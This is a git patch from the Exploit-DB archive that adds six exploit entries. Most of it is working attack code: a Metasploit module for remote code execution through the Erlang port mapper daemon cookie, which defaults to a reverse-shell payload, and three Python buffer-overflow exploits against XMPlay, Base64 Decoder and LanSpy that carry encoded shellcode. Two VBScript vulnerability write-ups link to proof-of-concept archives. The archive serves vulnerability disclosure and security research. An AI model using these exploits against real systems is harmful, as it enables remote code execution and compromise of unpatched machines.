From 1ddc5edd5d3879fd8a68c1c69ddf6e9e06a3c9a8 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 21 Dec 2018 05:01:52 +0000
Subject: [PATCH] DB: 2018-12-21

6 changes to exploits/shellcodes

VBScript - VbsErase Reference Leak Use-After-Free
VBScript - MSXML Execution Policy Bypass
LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)
XMPlay 3.8.3 - '.m3u' Local Stack Overflow Code Execution
Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)

Erlang - Port Mapper Daemon Cookie RCE (Metasploit)
---
 exploits/multiple/remote/46024.rb   | 156 ++++++++++++++++++++++++++++
 exploits/windows/dos/46022.txt      |  60 +++++++++++
 exploits/windows/dos/46023.txt      |  11 ++
 exploits/windows/local/46020.py     |  82 +++++++++++++++
 exploits/windows/local/46021.py     |  77 ++++++++++++++
 exploits/windows_x86/local/46018.py | 126 ++++++++++++++++++++++
 files_exploits.csv                  |   6 ++
 7 files changed, 518 insertions(+)
 create mode 100755 exploits/multiple/remote/46024.rb
 create mode 100644 exploits/windows/dos/46022.txt
 create mode 100644 exploits/windows/dos/46023.txt
 create mode 100755 exploits/windows/local/46020.py
 create mode 100755 exploits/windows/local/46021.py
 create mode 100755 exploits/windows_x86/local/46018.py

diff --git a/exploits/multiple/remote/46024.rb b/exploits/multiple/remote/46024.rb
new file mode 100755
index 000000000..92a0bfc8d
--- /dev/null
+++ b/exploits/multiple/remote/46024.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Erlang Port Mapper Daemon Cookie RCE',
+        'Description'    => %q{
+          The erlang port mapper daemon is used to coordinate distributed erlang instances.
+          Should an attacker get the authentication cookie RCE is trivial. Usually, this
+          cookie is named ".erlang.cookie" and varies on location.
+        },
+        'Author'         =>
+          [
+            'Daniel Mende',              # blog post article
+            'Milton Valencia (wetw0rk)', # metasploit module
+          ],
+        'References'     =>
+          [
+            ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['unix', 'win'],
+        'Arch'           => ARCH_CMD,
+        'Privileged'     => 'false',
+        'Targets'        =>
+          [
+            [ 'Unix',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+            ],
+            [ 'Windows',
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},
+            ]
+          ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),
+        Opt::RPORT(25672)
+      ])
+  end
+
+  def generate_challenge_digest(challenge)
+    challenge = challenge.unpack('H*')[0].to_i(16).to_s
+
+    hash = Digest::MD5.new
+    hash.update(datastore['COOKIE'])
+    hash.update(challenge)
+
+    vprint_status("MD5 digest generated: #{hash.hexdigest}")
+    return [hash.hexdigest].pack('H*')
+  end
+
+  def exploit
+    connect
+
+    our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
+
+    # SEND_NAME: send initial identification of who "we" are
+    send_name =  "\x00"                                     # Length: 0x0000
+    send_name << [(our_node.length+7).to_s(16)].pack('H*')  #
+    send_name << "\x6e"                                     # Tag: n
+    send_name << "\x00\x05"                                 # Version: R6 (5)
+    send_name << "\x00\x03\x49\x9c"                         # Flags (0x0003499c)
+    send_name << "#{our_node}"                              # <generated>@<generated>
+
+    # SEND_CHALLENGE_REPLY: return generated digest and its own challenge
+    send_challenge_reply =  "\x00\x15"  # Length: 21
+    send_challenge_reply << "\x72"      # Tag: r
+
+    # SEND: send the message to the node
+    send =  "\x00\x00\x00"                                                        # Length:0x00000000
+    send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') #
+    send << "\x70"                                                                #
+    send << "\x83"                                                                # VERSION_MAGIC
+    send << "\x68"                                                                # SMALL_TUPLE_EXT (104)
+    send << "\x04"                                                                #   Arity: 4
+    send << "\x61"                                                                #     SMALL_INTEGER_EXT
+    send << "\x06"                                                                #       Int: 6
+    send << "\x67"                                                                #     PID_EXT (103)
+    send << "\x64\x00"                                                            #       Node:
+    send << [(our_node.length).to_s(16)].pack('H*')                               #         Length: strlen(Node)
+    send << "#{our_node}"                                                         #         Node
+    send << "\x00\x00\x00\x03"                                                    #       ID
+    send << "\x00\x00\x00\x00"                                                    #       Serial
+    send << "\x00"                                                                #       Creation
+    send << "\x64"                                                                #     InternalSegmentIndex
+    send << "\x00\x00"                                                            #       Len: 0x0000
+    send << "\x64"                                                                #     InternalSegmentIndex
+    send << "\x00\x03"                                                            #       Length: 3
+    send << "rex"                                                                 #       AtomText: rex
+    send << "\x83\x68\x02\x67\x64\x00"                                            #
+    send << [(our_node.length).to_s(16)].pack('H*')                               # Length: strlen(Node)
+    send << "#{our_node}"                                                         # Node
+    send << "\x00\x00\x00\x03"                                                    # ID
+    send << "\x00\x00\x00\x00"                                                    # Serial
+    send << "\x00"                                                                # Creation
+    send << "\x68"                                                                # SMALL_TUPLE_EXT (104)
+    send << "\x05"                                                                #   Arity: 5
+    send << "\x64"                                                                #     InternalSegmentIndex
+    send << "\x00\x04"                                                            #       Length: 4
+    send << "call"                                                                #       AtomText: call
+    send << "\x64"                                                                #     InternalSegmentIndex
+    send << "\x00\x02"                                                            #       Length: 2
+    send << "os"                                                                  #       AtomText: os
+    send << "\x64"                                                                #     InternalSegmentIndex
+    send << "\x00\x03"                                                            #       Length: 3
+    send << "cmd"                                                                 #       AtomText: cmd
+    send << "\x6c"                                                                #     LIST_EXT
+    send << "\x00\x00\x00\x01"                                                    #       Length: 1
+    send << "\x6b"                                                                #       Elements: k
+    send << "\x00"                                                                #       Tail
+    send << [(payload.raw.length).to_s(16)].pack('H*')                            # strlen(Command)
+    send << payload.raw                                                           # Command
+    send << "\x6a"                                                                # NIL_EXT
+    send << "\x64"                                                                # InternalSegmentIndex
+    send << "\x00\x04"                                                            #   Length: 4
+    send << "user"                                                                #   AtomText: user
+
+    sock.put(send_name)
+
+    # recieve servers "SEND_CHALLENGE" token (4 bytes)
+    print_status("Receiving server challenge")
+    challenge = sock.get
+    challenge = challenge[14,4]
+
+    send_challenge_reply << challenge
+    send_challenge_reply << generate_challenge_digest(challenge)
+
+    print_status("Sending challenge reply")
+    sock.put(send_challenge_reply)
+
+    if sock.get.length < 1
+      fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}")
+    end
+
+    print_good("Authentication successful, sending payload")
+    sock.put(send)
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/dos/46022.txt b/exploits/windows/dos/46022.txt
new file mode 100644
index 000000000..26cb7e0d5
--- /dev/null
+++ b/exploits/windows/dos/46022.txt
@@ -0,0 +1,60 @@
+There is an reference leak in Microsoft VBScript that can be turned into an use-after-free given sufficient time. The vulnerability has been confirmed in Internet Explorer on various Windows versions with the latest patches applied.
+
+Details:
+
+VbsErase function is used to reset and free the contents of a VBScript array. When this function is called on a VBScript variable of the type array (implemented as a VAR structure containing a type followed by a value, in this case a pointer to a SafeArray object), the function follows these steps:
+
+1. Get the pointer to a SafeArray object from the VBScript variable and store it locally
+2. Set the pointer value in the VBScript variable to 0 (null)
+3. Release the array members (by calling SafeArrayDestroyData)
+4. Restore the pointer from step 2
+5. Destroy the array object itself (by calling SafeArrayDestroyDescriptor)
+6. Once again, set the pointer value in the VBScript variable to null
+
+The dance with setting the pointer to null and restoring it was made to address previously reported vulnerabilities described in http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html.
+
+However, this also introduced another bug. Specifically, if during SafeArrayDestroyData a user-defined callback runs, the callback can set the value of the VBScript variable passed to VbsErase to some other object (which increases the reference count of the object). If that happens, in steps 4 and 6 above, the pointer to the object will be overwritten, thus preventing its reference count to get properly decremented when the VBScript variable is assigned some other value.
+
+Consider the following code snippet:
+
+====================================
+
+Class class1
+End Class
+
+Class class2
+  Private Sub Class_Terminate()
+    ' increase the reference count of c
+    set a = c
+  End Sub
+End Class
+
+' create an object of class1 and increase its reference count
+c = new class1
+a = Array(0)
+set a(0) = new class2
+' call Class_Terminate of class2
+Erase a
+' a has been set to null so the following line doesn't affect c in any way
+a = 1
+' decrease the reference count of c
+c = 1
+' at this point the referenc couter of c is 1 instead of 0
+
+====================================
+
+When the code snippet finishes, the class1 object createad on the first line continues to live, even though all references to it have been lost so it should have been destroyed. This same principle can be used to increase the reference count of an arbitrary object any number of times without incurring a memory cost, eventually overflowing the 32-bit reference counter.
+
+Note that, while custom classes in VBScript have protection against overflowing a reference counter, this isn't the case for built-in objects (compare VBScriptClass::AddRef to AddRef methods of other classes). Because of this, the PoCs below use a RegExp object.
+
+The only problem is that for every reference counter increment, a new array has to be created and destroyed and a user-defined Class_Terminate needs to run which all takes time. Overflowing the 32-bit reference counter can take around 2 hours (depending on the CPU) and way longer if page heap is enabled for the iexplore.exe process.
+
+leak1.html (in attachment) contains the full PoC and leak1.txt contains a debug log for this.
+
+If you don't want to wait, a quicker way to demonstrate the issue is to just run the reference counter increase for certain number of iterations, and then increase it further (close to overflowing) via a debugger.
+
+leak2.html demonstrates this and leak2.txt contains the debug log (obtained in a 64 bit process with page heap enabled).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46022.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/46023.txt b/exploits/windows/dos/46023.txt
new file mode 100644
index 000000000..a76591367
--- /dev/null
+++ b/exploits/windows/dos/46023.txt
@@ -0,0 +1,11 @@
+According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, Starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.
+
+However, the VBScript execution policy does not appear to cover VBScript code in MSXML xsl files which can still execute VBScript, even when loaded from the Internet Zone.
+
+To demonstrate, place the files in the attached archive on a web server in the Internet zone and open index.html. If successful, the text "Hello from VBscript" will be rendered on the page. If you look at the provided code, this text is assembled dynamically by VBScript.
+
+This has been tested on Windows 10 Version 1803 with the latest patches applied and VBScript execution policy applied for the Internet Zone (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\140C = 3).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46023.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46020.py b/exploits/windows/local/46020.py
new file mode 100755
index 000000000..fe7783fd8
--- /dev/null
+++ b/exploits/windows/local/46020.py
@@ -0,0 +1,82 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
+# Date: 2018-12-19
+# Exploit Author: s7acktrac3
+# Vendor Homepage: https://www.xmplay.com/
+# Software Link: https://support.xmplay.com/files_view.php?file_id=676
+# Version: 3.8.3 (latest)
+# Tested on: Windows XP SP3
+# CVE : Reserved
+#
+# Developer notified & delivered PoC but not interested in fixing :P 
+#
+# Reproduction Steps:
+# Lauch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u
+# Either drag xmplay.m3u into the XMPlay window or File Menu-> select winamp.m3u. Application will "load"
+# for a minute (exploit searching through memory for payload) and eventually launch calc.exe 
+#
+# Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a 
+# beast!
+ 
+from struct import pack
+
+max_size = 728 
+# C:\Documents and Settings\Administrator\Desktop\Exploit Dev\xmplay_383-poc.py
+eip_offset = 500
+
+file_header  = "#EXTM3U\n\r" 
+file_header += "#EXTINF:200,Sleep Away\n\r"
+file_header += "http://test." 
+
+# cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin
+#  msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
+encoded_egg_hunter =  (""
+"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a" 
+"\x4a\x4a\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
+"\x38\x41\x42\x75\x4a\x49\x62\x46\x6f\x71\x4b\x7a\x49\x6f\x44"
+"\x4f\x53\x72\x36\x32\x61\x7a\x46\x62\x66\x38\x78\x4d\x64\x6e"
+"\x75\x6c\x75\x55\x63\x6a\x54\x34\x68\x6f\x6d\x68\x63\x47\x34"
+"\x70\x54\x70\x72\x54\x4e\x6b\x58\x7a\x4e\x4f\x42\x55\x6b\x5a"
+"\x4c\x6f\x31\x65\x78\x67\x59\x6f\x39\x77\x41\x41")
+
+encoded_calc =  "w00tw00t" + "\x57\x58\x04\x06\x50\x5E" # PUSH EDI, POP EAX, ADD AL,6, PUSH EAX, POP ESI
+encoded_calc += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
+encoded_calc += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
+encoded_calc += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+encoded_calc += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
+encoded_calc += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
+encoded_calc += "\x4a\x49\x36\x51\x49\x59\x52\x71\x61\x78"
+encoded_calc += "\x75\x33\x50\x61\x72\x4c\x31\x73\x73\x64"
+encoded_calc += "\x6e\x58\x49\x57\x6a\x33\x39\x52\x64\x37"
+encoded_calc += "\x6b\x4f\x38\x50\x41\x41"
+
+egg_addr_to_edx  = ""
+egg_addr_to_edx += "\x54" 				    #    PUSH ESP
+egg_addr_to_edx += "\x58" 				    #    POP EAX
+egg_addr_to_edx += "\x2D\x3C\x55\x55\x55"   #    SUB EAX,5555553C
+egg_addr_to_edx += "\x2D\x3C\x55\x55\x55"   #    SUB EAX,5555553C
+egg_addr_to_edx += "\x2D\x3C\x55\x55\x55"   #    SUB EAX,5555553C
+egg_addr_to_edx += "\x50" 				    #    PUSH eax
+egg_addr_to_edx += "\x5A"   			    #    POP EDX
+
+
+payload  = "A" * 12
+payload += encoded_calc
+payload += "A" * (eip_offset - len(payload))
+print "Length of payload " + str(len(payload)) 
+payload += pack("<L", 0x78196d4d) 			# Jmp esp OS DLL
+payload += "BBBB"
+payload += egg_addr_to_edx
+payload += "C" * (76  - len(egg_addr_to_edx) )
+payload += encoded_egg_hunter
+payload += "C" * (max_size - len(payload)) 
+stupid_char = "|"
+
+print "[+] Creating .m3u file with payload size: "+ str(len(payload)) 
+exploit = file_header + payload + stupid_char
+file = open('xmplay.m3u','w')
+file.write(exploit)
+file.close(); 
+print "[+] Done creating the file"
\ No newline at end of file
diff --git a/exploits/windows/local/46021.py b/exploits/windows/local/46021.py
new file mode 100755
index 000000000..dca5e91a8
--- /dev/null
+++ b/exploits/windows/local/46021.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python
+
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)
+# Date: 12-20-18
+# Vulnerable Software: Base64 Decoder 1.1.2
+# Vendor Homepage: http://4mhz.de/b64dec.html
+# Version: 1.1.2
+# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
+# Tested Windows 7 SP1 x86
+
+# PoC
+# 1. run script
+# 2. copy/paste base.txt contents into 'save to file' section of app
+# 3. select decode
+# 4. pop calc
+
+# orig dos poc from UN_NON, EDB: 39070
+
+import struct
+
+junk3 = "\x41" * 90
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
+#Payload size: 448 bytes
+calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
+"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
+"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
+"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
+"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
+"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
+"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
+"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
+"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
+"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
+"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
+"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
+"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
+"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
+"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
+"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
+"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
+"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
+"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
+"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
+"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
+"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
+"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
+"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
+"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
+"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
+
+junk2 = "\xcc"*50
+
+#jump to calc
+jmp3 = "\xe9\xaf\xfd\xff\xff\xcc"
+
+junk1 = "\xcc"*20
+
+#jump to jmp3
+jmp2 = "\xeb\xe4\xcc\xcc\xcc\xcc"
+
+#jump to jmp2
+jmp1 = "\xeb\xf8\xcc\xcc"
+
+#0x0045241e : pop esi # pop ebx # ret
+seh = struct.pack('<L',0x0045241e)
+
+buffer = junk3 + calc + junk2 + jmp3 + junk1 + jmp2 + jmp1 + seh
+    
+with open("base.txt","wb") as f:
+    f.write(buffer[:-1])
\ No newline at end of file
diff --git a/exploits/windows_x86/local/46018.py b/exploits/windows_x86/local/46018.py
new file mode 100755
index 000000000..c716ea16e
--- /dev/null
+++ b/exploits/windows_x86/local/46018.py
@@ -0,0 +1,126 @@
+# Exploit Title: LanSpy 2.0.1.159 - Local Buffer Overflow (SEH) (Egghunter)
+# Exploit Author: bzyo
+# Date: 12-19-18
+# Twitter: @bzyo_
+# Vulnerable Software: LanSpy 2.0.1.159
+# Vendor Homepage: https://lizardsystems.com
+# Version: 2.0.1.159 
+# Software Link 1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
+# Software Link 2: https://lizardsystems.com/download/lanspy_setup.exe
+# Tested Windows 7 SP1 x86
+
+# PoC
+# 1. run script
+# 2. copy/paste calcpayload.txt contents into scan section of app
+# 3. remove previous search contents
+# 4. copy/paste egghpayload.txt contents into scan section of app
+# 5. wait for egg to be found
+# 6. pop calc
+
+# was working on this when i saw seh poc published
+# submitting for the lulz
+
+# original dos poc from Gionathan "John" Reale, EDB: 45968
+# original seh poc from Juan Prescotto, EDB: 46009
+
+#badchars; 0's 1's and 20; maybe more?
+
+#!/usr/bin/python
+
+import struct
+ 
+file1="calcpayload.txt"
+file2="egghpayload.txt"
+
+#egghunter payload
+junk3 = "A"*506
+
+#125 bytes encoded egghunter 'BZYO'
+#msfvenom -p generic/custom PAYLOADFILE=eggh -e x86/alpha_mixed -f python
+eggh =  ""
+eggh += "\x89\xe5\xdd\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
+eggh += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
+eggh += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
+eggh += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+eggh += "\x50\x38\x41\x42\x75\x4a\x49\x62\x46\x6e\x61\x6b\x7a"
+eggh += "\x39\x6f\x34\x4f\x71\x52\x76\x32\x63\x5a\x45\x52\x63"
+eggh += "\x68\x6a\x6d\x54\x6e\x37\x4c\x54\x45\x31\x4a\x30\x74"
+eggh += "\x78\x6f\x78\x38\x42\x6f\x50\x59\x43\x6a\x53\x72\x6c"
+eggh += "\x4b\x68\x7a\x6e\x4f\x31\x65\x4a\x4a\x6e\x4f\x31\x65"
+eggh += "\x4b\x57\x6b\x4f\x6b\x57\x41\x41"
+
+#jump to eggh
+jmp2 = "\xe9\x30\xff\xff\xff"
+
+junk2 = "\xcc"*6
+
+#jump to jmp2
+jmp1 = "\xcc\xcc\xeb\xf1\xcc\xcc"
+
+junk1 = "\xcc"*16
+
+#jump to jmp1
+nseh = "\xeb\xea\xcc\xcc"
+
+#0x00458148 : pop ecx # pop ebp # ret 0x04
+seh = struct.pack('<L',0x00458148)
+
+#10 nops
+nops = "\x90"*10
+
+egghpayload = junk3 + nops + eggh + nops + jmp2 + junk2 + jmp1 + junk1 + nseh + seh
+
+#calc payload
+calcjunk1 = "D"*26
+
+#8 byte egg
+bzyo = "OYZBOYZB"
+
+#440 bytes for calc
+#msfvenom -p windows/exec CMD="calc" -e x86/alpha_mixed -f python
+calc =  ""
+calc += "\x89\xe2\xdd\xc5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49"
+calc += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+calc += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+calc += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+calc += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x58\x68\x6f"
+calc += "\x72\x63\x30\x53\x30\x55\x50\x45\x30\x4b\x39\x79\x75"
+calc += "\x54\x71\x39\x50\x33\x54\x4e\x6b\x52\x70\x66\x50\x6c"
+calc += "\x4b\x73\x62\x34\x4c\x4c\x4b\x71\x42\x32\x34\x4c\x4b"
+calc += "\x71\x62\x47\x58\x34\x4f\x4e\x57\x62\x6a\x46\x46\x35"
+calc += "\x61\x6b\x4f\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x74\x42"
+calc += "\x76\x4c\x71\x30\x4f\x31\x68\x4f\x76\x6d\x77\x71\x7a"
+calc += "\x67\x5a\x42\x58\x72\x56\x32\x32\x77\x4c\x4b\x43\x62"
+calc += "\x52\x30\x6e\x6b\x30\x4a\x67\x4c\x4c\x4b\x50\x4c\x34"
+calc += "\x51\x44\x38\x49\x73\x50\x48\x35\x51\x5a\x71\x76\x31"
+calc += "\x6c\x4b\x66\x39\x37\x50\x33\x31\x78\x53\x6c\x4b\x53"
+calc += "\x79\x57\x68\x69\x73\x56\x5a\x77\x39\x4e\x6b\x46\x54"
+calc += "\x6c\x4b\x56\x61\x6a\x76\x30\x31\x4b\x4f\x4c\x6c\x49"
+calc += "\x51\x48\x4f\x44\x4d\x47\x71\x59\x57\x65\x68\x4b\x50"
+calc += "\x52\x55\x69\x66\x34\x43\x71\x6d\x4b\x48\x37\x4b\x63"
+calc += "\x4d\x66\x44\x70\x75\x4b\x54\x63\x68\x4c\x4b\x70\x58"
+calc += "\x31\x34\x75\x51\x4a\x73\x45\x36\x6e\x6b\x76\x6c\x42"
+calc += "\x6b\x4e\x6b\x32\x78\x67\x6c\x57\x71\x59\x43\x4e\x6b"
+calc += "\x47\x74\x4e\x6b\x45\x51\x68\x50\x4d\x59\x30\x44\x34"
+calc += "\x64\x61\x34\x43\x6b\x31\x4b\x61\x71\x70\x59\x70\x5a"
+calc += "\x70\x51\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x42\x7a\x6e"
+calc += "\x6b\x47\x62\x48\x6b\x4c\x4d\x31\x4d\x52\x4a\x77\x71"
+calc += "\x4e\x6d\x6f\x75\x6e\x52\x53\x30\x65\x50\x57\x70\x30"
+calc += "\x50\x50\x68\x50\x31\x6e\x6b\x52\x4f\x4f\x77\x39\x6f"
+calc += "\x69\x45\x4f\x4b\x68\x70\x6f\x45\x39\x32\x36\x36\x52"
+calc += "\x48\x4e\x46\x6c\x55\x6d\x6d\x4f\x6d\x49\x6f\x4a\x75"
+calc += "\x57\x4c\x36\x66\x53\x4c\x35\x5a\x4f\x70\x49\x6b\x39"
+calc += "\x70\x53\x45\x74\x45\x6f\x4b\x71\x57\x45\x43\x33\x42"
+calc += "\x70\x6f\x52\x4a\x65\x50\x66\x33\x59\x6f\x7a\x75\x55"
+calc += "\x33\x33\x51\x32\x4c\x65\x33\x33\x30\x41\x41"
+
+calcjunk2 = "E"*30
+
+calcpayload = calcjunk1 + bzyo + calc + calcjunk2 
+
+textfile = open(file1 , 'w')
+textfile.write(calcpayload)
+textfile.close()
+textfile = open(file2 , 'w')
+textfile.write(egghpayload)
+textfile.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 237d12eec..ab3995076 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6220,6 +6220,8 @@ id,file,description,date,author,type,platform,port
 46002,exploits/windows/dos/46002.py,"AnyBurn 4.3 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
 46003,exploits/windows/dos/46003.py,"Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
 46004,exploits/windows/dos/46004.py,"MegaPing - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
+46022,exploits/windows/dos/46022.txt,"VBScript - VbsErase Reference Leak Use-After-Free",2018-12-20,"Google Security Research",dos,windows,
+46023,exploits/windows/dos/46023.txt,"VBScript - MSXML Execution Policy Bypass",2018-12-20,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10158,6 +10160,9 @@ id,file,description,date,author,type,platform,port
 46008,exploits/windows/local/46008.py,"PassFab RAR 9.3.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows,
 46009,exploits/windows/local/46009.py,"LanSpy 2.0.1.159 - Local Buffer Overflow",2018-12-19,"Juan Prescotto",local,windows,
 46016,exploits/windows/local/46016.py,"PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows,
+46018,exploits/windows_x86/local/46018.py,"LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)",2018-12-20,bzyo,local,windows_x86,
+46020,exploits/windows/local/46020.py,"XMPlay 3.8.3 - '.m3u' Local Stack Overflow Code Execution",2018-12-20,s7acktrac3,local,windows,
+46021,exploits/windows/local/46021.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)",2018-12-20,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
